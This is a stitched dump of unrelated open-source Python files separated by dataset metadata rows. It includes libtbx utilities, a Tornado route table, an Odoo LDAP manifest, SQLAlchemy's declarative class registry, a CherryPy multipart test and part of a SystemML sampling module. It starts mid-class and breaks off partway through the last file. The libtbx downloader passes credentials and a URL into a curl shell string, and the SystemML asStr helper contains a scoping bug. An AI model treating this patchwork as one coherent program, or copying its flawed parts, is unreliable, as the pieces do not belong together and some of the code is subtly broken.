def _atexit(self):
if (not self.closed):
for f,a in zip(self.file_objects, self.atexit_send_to):
if (a is not None): a.write(f.getvalue())
def register(self, label, file_object, atexit_send_to=None):
"""Adds an output stream to the list."""
assert not self.closed
self.labels.append(label)
self.file_objects.append(file_object)
self.atexit_send_to.append(atexit_send_to)
return self
def replace_stringio(self,
old_label,
new_label,
new_file_object,
new_atexit_send_to=None):
i = self.labels.index(old_label)
old_file_object = self.file_objects[i]
new_file_object.write(old_file_object.getvalue())
old_file_object.close()
self.labels[i] = new_label
self.file_objects[i] = new_file_object
self.atexit_send_to[i] = new_atexit_send_to
def isatty(self):
return False
def close(self):
for file_object in self.file_objects:
if (file_object is sys.__stdout__): continue
if (file_object is sys.__stderr__): continue
file_object.close()
self.closed = True
def flush(self):
for file_object in self.file_objects:
flush = getattr(file_object, "flush", None)
if (flush is not None): flush()
def write(self, str):
for file_object in self.file_objects:
file_object.write(str)
def writelines(self, sequence):
for file_object in self.file_objects:
file_object.writelines(sequence)
def write_this_is_auto_generated(f, file_name_generator):
print >> f, """\
/* *****************************************************
THIS IS AN AUTOMATICALLY GENERATED FILE. DO NOT EDIT.
*****************************************************
Generated by:
%s
*/
""" % file_name_generator
class import_python_object:
def __init__(self, import_path, error_prefix, target_must_be, where_str):
path_elements = import_path.split(".")
if (len(path_elements) < 2):
raise ValueError(
'%simport path "%s" is too short%s%s' % (
error_prefix, import_path, target_must_be, where_str))
module_path = ".".join(path_elements[:-1])
try: module = __import__(module_path)
except ImportError:
raise ImportError("%sno module %s%s" % (
error_prefix, module_path, where_str))
for attr in path_elements[1:-1]:
module = getattr(module, attr)
try: self.object = getattr(module, path_elements[-1])
except AttributeError:
raise AttributeError(
'%sobject "%s" not found in module "%s"%s' % (
error_prefix, path_elements[-1], module_path, where_str))
self.path_elements = path_elements
self.module_path = module_path
self.module = module
class input_with_prompt(object):
def __init__(self, prompt, tracebacklimit=0):
try: import readline
except Exception: pass
try: self.previous_tracebacklimit = sys.tracebacklimit
except Exception: self.previous_tracebacklimit = None
if (tracebacklimit is not None):
sys.tracebacklimit = tracebacklimit
self.input = raw_input(prompt)
def __del__(self):
if (self.previous_tracebacklimit is None):
del sys.tracebacklimit
else:
sys.tracebacklimit = self.previous_tracebacklimit
def count_max(assert_less_than):
i = 0
while True:
yield None
i += 1
assert i < assert_less_than
class detect_binary_file(object):
def __init__(self, monitor_initial=None, max_fraction_non_ascii=None):
if (monitor_initial is None):
self.monitor_initial = 1000
else:
self.monitor_initial = monitor_initial
if (max_fraction_non_ascii is None):
self.max_fraction_non_ascii = 0.05
else:
self.max_fraction_non_ascii = max_fraction_non_ascii
self.n_ascii_characters = 0
self.n_non_ascii_characters = 0
self.status = None
def is_binary_file(self, block):
if (self.monitor_initial > 0):
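# bytes with ordinal strictly between 1 and 128 are counted as ASCII text; everything else as non-ASCII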
for c in block:
if (1 < ord(c) < 128):
self.n_ascii_characters += 1
else:
self.n_non_ascii_characters += 1
self.monitor_initial -= 1
if (self.monitor_initial == 0):
if ( self.n_non_ascii_characters
> self.n_ascii_characters * self.max_fraction_non_ascii):
self.status = True
else:
self.status = False
break
return self.status
def from_initial_block(
file_name,
monitor_initial=None,
max_fraction_non_ascii=None):
detector = detect_binary_file(
monitor_initial=monitor_initial,
max_fraction_non_ascii=max_fraction_non_ascii)
block = open(file_name, "rb").read(detector.monitor_initial)
if (len(block) == 0): return False
detector.monitor_initial = min(len(block), detector.monitor_initial)
return detector.is_binary_file(block=block)
from_initial_block = staticmethod(from_initial_block)
def search_for(
pattern,
mode,
re_flags=0,
lines=None,
file_name=None):
assert mode in ["==", "find", "startswith", "endswith", "re.search", "re.match"]
assert [lines, file_name].count(None) == 1
if (lines is None):
lines = open(file_name).read().splitlines()
result = []
a = result.append
if (mode == "=="):
for l in lines:
if (l == pattern): a(l)
elif (mode == "startswith"):
for l in lines:
if (l.startswith(pattern)): a(l)
elif (mode == "endswith"):
for l in lines:
if (l.endswith(pattern)): a(l)
elif (mode == "find"):
for l in lines:
if (l.find(pattern) >= 0): a(l)
elif (mode == "re.search"):
import re
for l in lines:
if (re.search(pattern=pattern, string=l, flags=re_flags) is not None):
a(l)
else:
import re
for l in lines:
if (re.match(pattern=pattern, string=l, flags=re_flags) is not None):
a(l)
return result
class progress_displayed_as_fraction(object):
def __init__(self, n):
self.n = n
self.i = 0
if self.n == 1: self.advance = lambda: None
self.advance()
def advance(self):
if self.i > 0: sys.stdout.write('\r')
sys.stdout.write("%i / %i" % (self.i, self.n))
sys.stdout.flush()
self.i += 1
def done(self):
if self.n == 1: return
sys.stdout.write("\n")
sys.stdout.flush()
class progress_bar(progress_displayed_as_fraction):
def advance(self):
characters = ['|']
if self.i > 0:
characters.extend(['=']*(self.i-1))
characters.append('>')
characters.extend(' '*(self.n - self.i))
characters.append('|\r')
sys.stdout.write(''.join(characters))
sys.stdout.flush()
self.i += 1
def format_float_with_standard_uncertainty(value, standard_uncertainty):
if standard_uncertainty < 1e-16: return str(value)
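# number of decimal places implied by the magnitude of the standard uncertainty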
precision = -int(round(math.log10(standard_uncertainty)))
if precision > -1:
su = standard_uncertainty * math.pow(10, precision)
if round(su,1) < 2:
su *= 10
precision += 1
fmt_str = "%%.%if(%%i)" %precision
return fmt_str %(value, round(su))
else:
precision += 1
su = int(round(standard_uncertainty, precision))
fmt_str = "%.0f(%i)"
return fmt_str %(round(value, precision), su)
def random_hex_code(number_of_digits):
import random
digits = []
for i_digit in xrange(number_of_digits):
i = random.randrange(16)
digits.append("0123456789abcdef"[i])
return "".join(digits)
def get_svn_revision(path=None):
# adapted from:
# http://code.djangoproject.com/browser/django/trunk/django/utils/version.py
rev = None
if path is None:
import libtbx.load_env
path = op.dirname(libtbx.env.dist_path(module_name="libtbx"))
entries_path = '%s/.svn/entries' % path
try:
entries = open(entries_path, 'r').read()
except IOError:
pass
else:
# Versions >= 7 of the entries file are flat text. The first line is
# the version number. The next set of digits after 'dir' is the revision.
if re.match('(\d+)', entries):
rev_match = re.search('\d+\s+dir\s+(\d+)', entries)
if rev_match:
rev = int(rev_match.groups()[0])
return rev
def get_build_tag(path=None):
tag = None
if path is None:
import libtbx.load_env
path = op.dirname(libtbx.env.dist_path(module_name="libtbx"))
tag_file_path = "%s/TAG" %path
if op.exists(tag_file_path):
tag = open(tag_file_path).readline().strip()
return tag
def getcwd_safe () :
try :
cwd = os.getcwd()
except OSError, e :
if (e.errno == 2) :
raise Sorry("Could not determine the current working directory because "+
"it has been deleted or unmounted.")
else :
raise e
return cwd
def getcwd_or_default (default=None) :
if (default is None) :
if (os.name == "nt") :
home_drive = os.environ.get("HOMEDRIVE", "C:")
home_dir = os.environ.get("HOMEPATH", "\\")
default = home_drive + home_dir
else :
default = os.environ.get("HOME", "/")
try :
cwd = os.getcwd()
except OSError, e :
if (e.errno == 2) :
cwd = default
else :
raise e
return cwd
def create_run_directory (prefix, default_directory_number=None) :
"""
Create a program output directory using sequential numbering, picking the
highest run ID. In other words, if the prefix is 'Refine' and the current
directory contains subdirectories named Refine_2 and Refine_9, the new
directory will be Refine_10.
"""
dir_number = default_directory_number
if (dir_number is None) :
dir_ids = []
for file_name in os.listdir(os.getcwd()) :
if (os.path.isdir(file_name)) and (file_name.startswith(prefix)) :
dir_id = file_name.split("_")[-1]
if (dir_id.isdigit()) :
dir_ids.append(int(dir_id))
if (len(dir_ids) > 0) :
dir_number = max(max(dir_ids) + 1, 1)
else :
dir_number = 1
dir_name = prefix + "_" + str(dir_number)
if (os.path.isdir(dir_name)) :
raise OSError("The directory %s already exists."%os.path.abspath(dir_name))
else :
os.makedirs(dir_name)
return os.path.abspath(dir_name)
class tmp_dir_wrapper (object) :
"""
Convenience methods for running in a (presumably empty) temporary directory
and copying all files to another directory. Can be used whether or not the
temporary directory is actually defined; if None, no action will be taken.
Otherwise, both tmp_dir and dest_dir (default is current directory) must be
existing paths.
"""
def __init__ (self, tmp_dir, dest_dir=None, out=sys.stdout) :
if (dest_dir is None) :
dest_dir = os.getcwd()
self.tmp_dir = tmp_dir
self.dest_dir = dest_dir
if (tmp_dir is None) :
pass
elif (not os.path.isdir(tmp_dir)) :
raise Sorry("The temporary directory %s does not exist." % tmp_dir)
else :
if (not os.path.isdir(dest_dir)) :
raise Sorry("The destination directory %s does not exist." % dest_dir)
print >> out, "Changing working directory to %s" % tmp_dir
print >> out, "Ultimate destination is %s" % dest_dir
os.chdir(tmp_dir)
def transfer_files (self, out=sys.stdout) :
if (self.tmp_dir is None) : return False
assert os.path.isdir(self.dest_dir)
files = os.listdir(self.tmp_dir)
print >> out, "Copying all output files to %s" % self.dest_dir
for file_name in files :
print >> out, " ... %s" % file_name
shutil.copy(os.path.join(self.tmp_dir, file_name), self.dest_dir)
print >> out, ""
return True
def show_development_warning (out=sys.stdout) :
print >> out, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! WARNING - EXPERIMENTAL PROGRAM !!
!! !!
!! This program is still in development - some functionality may be !!
!! missing and/or untested. Use at your own risk! For bug reports, etc. !!
!! email [email protected]. !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def check_if_output_directory_exists (file_name=None, dir_name=None) :
if (file_name is not None) :
assert (dir_name is None)
dir_name = os.path.dirname(file_name)
if (dir_name == "") : return
if (dir_name is None) :
raise Sorry("No output directory specified.")
if (not op.isdir(dir_name)) :
raise Sorry(("The specified output directory (%s) does not exist or "+
"is not a directory.") % dir_name)
else :
# XXX writing to Dropbox folders is generally not a good idea
head, tail = os.path.split(dir_name)
while tail != "" :
if (tail == "Dropbox") :
warnings.warn("You are directing output to a Dropbox directory. "+
"Please note that this is not guaranteed to work in all cases; "+
"use at your own risk.", UserWarning)
head, tail = os.path.split(head)
def concatenate_python_script (out, file_name) :
"""
Insert a Python script into an existing file, removing any __future__
import to prevent syntax errors. (This could be dangerous in most contexts
but is required for some of our Coot-related scripts to work.)
"""
data = open(file_name, "r").read()
print >> out, ""
print >> out, "#--- script copied from %s" % os.path.basename(file_name)
for line in data.splitlines() :
if line.startswith("from __future__") :
continue
else :
print >> out, line
print >> out, "#--- end"
print >> out, ""
def greek_time(secs):
for greek in ["","milli", "micro", "nano"]:
if secs>1:
break
secs*=1000
return secs, greek
###########################
# URL retrieval functions #
###########################
libtbx_urllib_proxy = None
def install_urllib_http_proxy (server, port=80, user=None, password=None) :
global libtbx_urllib_proxy
import urllib2
if (user is None) :
proxy = urllib2.ProxyHandler({'http': '%s:%d' % (server, port) })
opener = urllib2.build_opener(proxy)
else :
proxy = urllib2.ProxyHandler({
'http': 'http://%s:%s@%s:%s' % (user, password, server, port),
})
auth = urllib2.HTTPBasicAuthHandler()
opener = urllib2.build_opener(proxy, auth, urllib2.HTTPHandler)
libtbx_urllib_proxy = proxy
urllib2.install_opener(opener)
print "Installed urllib2 proxy at %s:%d" % (server, port)
return proxy
def urlopen (*args, **kwds) :
"""
Substitute for urllib2.urlopen, with automatic HTTP proxy configuration
if specific environment variables are defined.
"""
if ("CCTBX_HTTP_PROXY" in os.environ) and (libtbx_urllib_proxy is None) :
server = os.environ["CCTBX_HTTP_PROXY_SERVER"]
port = os.environ.get("CCTBX_HTTP_PROXY_PORT", 80)
user = os.environ.get("CCTBX_HTTP_PROXY_USER", None)
passwd = os.environ.get("CCTBX_HTTP_PROXY_PASSWORD", None)
if (user is not None) and (passwd is None) :
raise Sorry("You have defined a user name for the HTTP proxy, but "+
"no password was specified. Please set the environment variable "+
"CCTBX_HTTP_PROXY_PASSWORD.")
install_urllib_http_proxy(
server=server,
port=port,
user=user,
password=passwd)
import urllib2
return urllib2.urlopen(*args, **kwds)
class download_progress (object) :
"""
Simple proxy for displaying download status - here with methods for
writing to the console, but can be subclassed and used for graphical display.
"""
def __init__ (self, log=None, n_kb_total=None) :
if (log is None) :
log = null_out()
self.log = log
self.n_kb_total = n_kb_total
self.n_kb_elapsed = 0
def set_total_size (self, n_kb_total) :
self.n_kb_total = n_kb_total
self.n_kb_elapsed = 0
def increment (self, n_kb) :
assert (self.n_kb_total is not None)
self.n_kb_elapsed += n_kb
return self.show_progress()
def show_progress (self) :
self.log.write("\r%d/%d KB downloaded" % (self.n_kb_elapsed,
self.n_kb_total))
self.log.flush()
return True
def percent_finished (self) :
assert (self.n_kb_total is not None)
return 100 * min(1.0, self.n_kb_elapsed / self.n_kb_total)
def complete (self) :
self.log.write("\rDownload complete")
def run_continuously (self) :
"""
Placeholder for cases where the download is not being run asynchronously.
"""
pass
class download_target (object) :
"""
Flexible callable object for retrieving a file from a URL, with optional
HTTPS authentication. Designed to be runnable in a separate thread with
graphical progress update.
Note that in some circumstances SSL support may be missing from the socket
module, in which case we use 'curl' to download securely. (This will not
work on Windows, obviously.)
"""
def __init__ (self,
url,
file_name,
use_curl=None, # SSL only
user=None, # SSL only
password=None, # SSL only
base_url=None) : # SSL only
self.url = url
self.file_name = file_name
self.use_curl = use_curl
self.user = user
self.password = password
self.base_url = base_url
if (not None in [self.user, self.password]) :
assert (self.base_url is not None)
import socket
if ((not self.use_curl) and (hasattr(socket, "ssl")) and
(hasattr(socket.ssl, "__call__"))) :
self.use_curl = False
else :
self.use_curl = True
def __call__ (self, log=None, progress_meter=None) :
if (log is None) :
log = null_out()
if (progress_meter is None) :
progress_meter = download_progress(log=log)
from libtbx import easy_run
import urllib2
file_name = self.file_name # return value
if (not self.use_curl) :
if (not None in [self.user, self.password]) :
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, self.base_url, self.user, self.password)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
req = urllib2.urlopen(self.url)
info = req.info()
n_kb_total = int(info['Content-length']) / 1024
progress_meter.set_total_size(n_kb_total)
# TODO adjust chunk size automatically based on download speed
n_kb_chunk = getattr(self, "n_kb_chunk", 512)
chunksize = n_kb_chunk * 1024
fp = open(self.file_name, 'wb')
while True:
chunk = req.read(chunksize)
if not chunk: break
if not progress_meter.increment(n_kb_chunk) :
file_name = None
break
fp.write(chunk)
fp.close()
progress_meter.complete()
else :
progress_meter.run_continuously()
if (not None in [self.user, self.password]) :
curl_args = "--user %s:%s" % (self.user, self.password)
rc = easy_run.call("curl %s \"%s\" -o %s" % (curl_args, self.url,
self.file_name))
progress_meter.complete()
if (rc != 0) :
raise RuntimeError("curl exited with code %d" % rc)
if (file_name is None) :
return None
return op.abspath(self.file_name)
| mit | 215,904,346,378,941,440 | 29.949574 | 82 | 0.625055 | false |
ptphp/PyLib | src/tornado/demos/Vulpix-master/handlers.py | 2 | 1560 | # -*- coding: utf-8 -*-
# AUTHOR: Zeray Rice <[email protected]>
# FILE: handlers.py
# CREATED: 01:41:06 08/03/2012
# MODIFIED: 20:28:26 18/04/2012
# DESCRIPTION: URL Route

from api import *
from home import *
from lang import *
from forum import *
from member import *
from problem import *
from contest import *
from backstage import *

'''
   Handler naming convention: [verb-object structure / noun] + Handler
'''

handlers = [
    (r'/', HomeHandler),
    (r'/signin', SigninHandler),
    (r'/signup', SignupHandler),
    (r'/signout', SignoutHandler),
    (r'/settings', SettingsHandler),
    (r'/settings/changepass', ChangePasswordHandler),
    (r'/member', ListMemberHandler),
    (r'/member/(.*)', MemberHandler),
    (r'/lang/(.*)', SetLanguageHandler),
    (r'/problem', ListProblemHandler),
    (r'/problem/([\d]*)', ViewProblemHandler),
    (r'/tag/(.*)', ViewTagHandler),
    (r'/submit', ListSubmitHandler),
    (r'/submit/(.*)', ViewSubmitHandler),
    (r'/backstage/problem/add', AddProblemHandler),
    (r'/backstage/contest/add', AddContestHandler),
    (r'/backstage/node/add', AddNodeHandler),
    (r'/backstage/judger', ManageJudgerHandler),
    (r'/backstage/judger/add', AddJudgerHandler),
    (r'/contest', ListContestHandlder),
    (r'/contest/([\d]*)', ViewContestHandler),
    (r'/go/(.*)', ViewNodeHandler),
    (r'/t/([\d]*)', ViewTopicHandler),
    (r'/new/(.*)', CreateTopicHandler),
    (r'/forum', ViewForumHandler),
    (r'/test', TestHandler),
    (r'/api/problem/get/([\d]*)', GetProblemHandler),
]
| apache-2.0 | 5,842,432,996,212,796,000 | 30.387755 | 54 | 0.623537 | false |
nhomar/odoo-mirror | addons/auth_ldap/__openerp__.py | 50 | 1567 | ##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name' : 'Authentication via LDAP',
    'version' : '1.0',
    'depends' : ['base'],
    'images' : ['images/ldap_configuration.jpeg'],
    'author' : 'OpenERP SA',
    #'description': < auto-loaded from README file
    'website' : 'https://www.odoo.com',
    'category' : 'Authentication',
    'data' : [
        'users_ldap_view.xml',
        'user_ldap_installer.xml',
        'security/ir.model.access.csv',
    ],
    'auto_install': False,
    'installable': True,
    'external_dependencies' : {
        'python' : ['ldap'],
    }
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,194,602,147,659,977,700 | 37.219512 | 78 | 0.590938 | false |
mitsuhiko/sqlalchemy | lib/sqlalchemy/ext/declarative/clsregistry.py | 6 | 9816 | # ext/declarative/clsregistry.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Routines to handle the string class registry used by declarative.
This system allows specification of classes and expressions used in
:func:`.relationship` using strings.
"""
from ...orm.properties import ColumnProperty, RelationshipProperty, \
SynonymProperty
from ...schema import _get_table_key
from ...orm import class_mapper, interfaces
from ... import util
from ... import exc
import weakref
# strong references to registries which we place in
# the _decl_class_registry, which is usually weak referencing.
# the internal registries here link to classes with weakrefs and remove
# themselves when all references to contained classes are removed.
_registries = set()
def add_class(classname, cls):
"""Add a class to the _decl_class_registry associated with the
given declarative class.
"""
if classname in cls._decl_class_registry:
# class already exists.
existing = cls._decl_class_registry[classname]
if not isinstance(existing, _MultipleClassMarker):
existing = \
cls._decl_class_registry[classname] = \
_MultipleClassMarker([cls, existing])
else:
cls._decl_class_registry[classname] = cls
try:
root_module = cls._decl_class_registry['_sa_module_registry']
except KeyError:
cls._decl_class_registry['_sa_module_registry'] = \
root_module = _ModuleMarker('_sa_module_registry', None)
tokens = cls.__module__.split(".")
# build up a tree like this:
# modulename: myapp.snacks.nuts
#
# myapp->snack->nuts->(classes)
# snack->nuts->(classes)
# nuts->(classes)
#
# this allows partial token paths to be used.
while tokens:
token = tokens.pop(0)
module = root_module.get_module(token)
for token in tokens:
module = module.get_module(token)
module.add_class(classname, cls)
class _MultipleClassMarker(object):
"""refers to multiple classes of the same name
within _decl_class_registry.
"""
def __init__(self, classes, on_remove=None):
self.on_remove = on_remove
self.contents = set([
weakref.ref(item, self._remove_item) for item in classes])
_registries.add(self)
def __iter__(self):
return (ref() for ref in self.contents)
def attempt_get(self, path, key):
if len(self.contents) > 1:
raise exc.InvalidRequestError(
"Multiple classes found for path \"%s\" "
"in the registry of this declarative "
"base. Please use a fully module-qualified path." %
(".".join(path + [key]))
)
else:
ref = list(self.contents)[0]
cls = ref()
if cls is None:
raise NameError(key)
return cls
def _remove_item(self, ref):
self.contents.remove(ref)
if not self.contents:
_registries.discard(self)
if self.on_remove:
self.on_remove()
def add_item(self, item):
modules = set([cls().__module__ for cls in self.contents])
if item.__module__ in modules:
util.warn(
"This declarative base already contains a class with the "
"same class name and module name as %s.%s, and will "
"be replaced in the string-lookup table." % (
item.__module__,
item.__name__
)
)
self.contents.add(weakref.ref(item, self._remove_item))
class _ModuleMarker(object):
""""refers to a module name within
_decl_class_registry.
"""
def __init__(self, name, parent):
self.parent = parent
self.name = name
self.contents = {}
self.mod_ns = _ModNS(self)
if self.parent:
self.path = self.parent.path + [self.name]
else:
self.path = []
_registries.add(self)
def __contains__(self, name):
return name in self.contents
def __getitem__(self, name):
return self.contents[name]
def _remove_item(self, name):
self.contents.pop(name, None)
if not self.contents and self.parent is not None:
self.parent._remove_item(self.name)
_registries.discard(self)
def resolve_attr(self, key):
return getattr(self.mod_ns, key)
def get_module(self, name):
if name not in self.contents:
marker = _ModuleMarker(name, self)
self.contents[name] = marker
else:
marker = self.contents[name]
return marker
def add_class(self, name, cls):
if name in self.contents:
existing = self.contents[name]
existing.add_item(cls)
else:
existing = self.contents[name] = \
_MultipleClassMarker([cls],
on_remove=lambda: self._remove_item(name))
class _ModNS(object):
def __init__(self, parent):
self.__parent = parent
def __getattr__(self, key):
try:
value = self.__parent.contents[key]
except KeyError:
pass
else:
if value is not None:
if isinstance(value, _ModuleMarker):
return value.mod_ns
else:
assert isinstance(value, _MultipleClassMarker)
return value.attempt_get(self.__parent.path, key)
raise AttributeError("Module %r has no mapped classes "
"registered under the name %r" % (self.__parent.name, key))
class _GetColumns(object):
def __init__(self, cls):
self.cls = cls
def __getattr__(self, key):
mp = class_mapper(self.cls, configure=False)
if mp:
if key not in mp.all_orm_descriptors:
raise exc.InvalidRequestError(
"Class %r does not have a mapped column named %r"
% (self.cls, key))
desc = mp.all_orm_descriptors[key]
if desc.extension_type is interfaces.NOT_EXTENSION:
prop = desc.property
if isinstance(prop, SynonymProperty):
key = prop.name
elif not isinstance(prop, ColumnProperty):
raise exc.InvalidRequestError(
"Property %r is not an instance of"
" ColumnProperty (i.e. does not correspond"
" directly to a Column)." % key)
return getattr(self.cls, key)
class _GetTable(object):
def __init__(self, key, metadata):
self.key = key
self.metadata = metadata
def __getattr__(self, key):
return self.metadata.tables[
_get_table_key(key, self.key)
]
def _determine_container(key, value):
if isinstance(value, _MultipleClassMarker):
value = value.attempt_get([], key)
return _GetColumns(value)
def _resolver(cls, prop):
def resolve_arg(arg):
import sqlalchemy
from sqlalchemy.orm import foreign, remote
fallback = sqlalchemy.__dict__.copy()
fallback.update({'foreign': foreign, 'remote': remote})
def access_cls(key):
if key in cls._decl_class_registry:
return _determine_container(key, cls._decl_class_registry[key])
elif key in cls.metadata.tables:
return cls.metadata.tables[key]
elif key in cls.metadata._schemas:
return _GetTable(key, cls.metadata)
elif '_sa_module_registry' in cls._decl_class_registry and \
key in cls._decl_class_registry['_sa_module_registry']:
registry = cls._decl_class_registry['_sa_module_registry']
return registry.resolve_attr(key)
else:
return fallback[key]
d = util.PopulateDict(access_cls)
def return_cls():
try:
x = eval(arg, globals(), d)
if isinstance(x, _GetColumns):
return x.cls
else:
return x
except NameError as n:
raise exc.InvalidRequestError(
"When initializing mapper %s, expression %r failed to "
"locate a name (%r). If this is a class name, consider "
"adding this relationship() to the %r class after "
"both dependent classes have been defined." %
(prop.parent, arg, n.args[0], cls)
)
return return_cls
return resolve_arg
def _deferred_relationship(cls, prop):
if isinstance(prop, RelationshipProperty):
resolve_arg = _resolver(cls, prop)
for attr in ('argument', 'order_by', 'primaryjoin', 'secondaryjoin',
'secondary', '_user_defined_foreign_keys', 'remote_side'):
v = getattr(prop, attr)
if isinstance(v, str):
setattr(prop, attr, resolve_arg(v))
if prop.backref and isinstance(prop.backref, tuple):
key, kwargs = prop.backref
for attr in ('primaryjoin', 'secondaryjoin', 'secondary',
'foreign_keys', 'remote_side', 'order_by'):
if attr in kwargs and isinstance(kwargs[attr], str):
kwargs[attr] = resolve_arg(kwargs[attr])
return prop
| mit | -4,564,434,234,913,575,000 | 32.848276 | 84 | 0.561532 | false |
CeltonMcGrath/TACTIC | 3rd_party/CherryPy/cherrypy/test/test_mime.py | 6 | 3459 | """Tests for various MIME issues, including the safe_multipart Tool."""
from cherrypy.test import test
test.prefer_parent_path()
import cherrypy
def setup_server():
class Root:
def multipart(self, parts):
return repr(parts)
multipart.exposed = True
def flashupload(self, Filedata, Upload, Filename):
return ("Upload: %r, Filename: %r, Filedata: %r" %
(Upload, Filename, Filedata.file.read()))
flashupload.exposed = True
cherrypy.config.update({'server.max_request_body_size': 0})
cherrypy.tree.mount(Root())
# Client-side code #
from cherrypy.test import helper
class MultipartTest(helper.CPWebCase):
def test_multipart(self):
text_part = u"This is the text version"
html_part = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
</head>
<body bgcolor="#ffffff" text="#000000">
This is the <strong>HTML</strong> version
</body>
</html>
"""
body = '\r\n'.join([
"--123456789",
"Content-Type: text/plain; charset='ISO-8859-1'",
"Content-Transfer-Encoding: 7bit",
"",
text_part,
"--123456789",
"Content-Type: text/html; charset='ISO-8859-1'",
"",
html_part,
"--123456789--"])
headers = [
('Content-Type', 'multipart/mixed; boundary=123456789'),
('Content-Length', len(body)),
]
self.getPage('/multipart', headers, "POST", body)
self.assertBody(repr([text_part, html_part]))
class SafeMultipartHandlingTest(helper.CPWebCase):
def test_Flash_Upload(self):
headers = [
('Accept', 'text/*'),
('Content-Type', 'multipart/form-data; '
'boundary=----------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6'),
('User-Agent', 'Shockwave Flash'),
('Host', 'www.example.com:8080'),
('Content-Length', '499'),
('Connection', 'Keep-Alive'),
('Cache-Control', 'no-cache'),
]
filedata = ('<?xml version="1.0" encoding="UTF-8"?>\r\n'
'<projectDescription>\r\n'
'</projectDescription>\r\n')
body = (
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; name="Filename"\r\n'
'\r\n'
'.project\r\n'
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; '
'name="Filedata"; filename=".project"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
+ filedata +
'\r\n'
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; name="Upload"\r\n'
'\r\n'
'Submit Query\r\n'
# Flash apps omit the trailing \r\n on the last line:
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6--'
)
self.getPage('/flashupload', headers, "POST", body)
self.assertBody("Upload: u'Submit Query', Filename: u'.project', "
"Filedata: %r" % filedata)
if __name__ == '__main__':
helper.testmain()
| epl-1.0 | 4,094,526,645,165,832,000 | 31.942857 | 87 | 0.52096 | false |
asurve/incubator-systemml | src/main/python/systemml/random/sampling.py | 13 | 5293 | #-------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#-------------------------------------------------------------
__all__ = ['normal', 'uniform', 'poisson']
from ..defmatrix import *
# Special object used internally to specify the placeholder which will be replaced by output ID
# This helps to provide dml containing output ID in constructSamplingNode
OUTPUT_ID = '$$OutputID$$'
def constructSamplingNode(inputs, dml):
"""
Convenient utility to create an intermediate of AST.
Parameters
----------
inputs = list of input matrix objects and/or DMLOp
dml = list of DML string (which will be eventually joined before execution). To specify out.ID, please use the placeholder
"""
dmlOp = DMLOp(inputs)
out = matrix(None, op=dmlOp)
dmlOp.dml = [out.ID if x==OUTPUT_ID else x for x in dml]
return out
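# Minimal usage sketch (an added illustration, not from the original source): a caller
# builds the DML with the placeholder and lets constructSamplingNode patch in the
# generated output ID, e.g.
#     out = constructSamplingNode([], [OUTPUT_ID, ' = random.uniform(2, 2, 1.0)\n'])
# The returned matrix wraps a DMLOp whose dml list now starts with out.ID.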
INPUTS = []
def asStr(arg):
"""
Internal use only: Convenient utility to update inputs and return appropriate string value
"""
if isinstance(arg, matrix):
INPUTS = INPUTS + [ arg ]
return arg.ID
else:
return str(arg)
def normal(loc=0.0, scale=1.0, size=(1,1), sparsity=1.0):
"""
Draw random samples from a normal (Gaussian) distribution.
Parameters
----------
loc: Mean ("centre") of the distribution.
scale: Standard deviation (spread or "width") of the distribution.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.normal(loc=3, scale=2, size=(3,3))
>>> m1.toNumPy()
array([[ 3.48857226, 6.17261819, 2.51167259],
[ 3.60506708, -1.90266305, 3.97601633],
[ 3.62245706, 5.9430881 , 2.53070413]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
loc = asStr(loc)
scale = asStr(scale)
sparsity = asStr(sparsity)
# loc + scale*standard normal
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = ', loc,' + ', scale,' * random.normal(', rows, ',', cols, ',', sparsity, ')\n'])
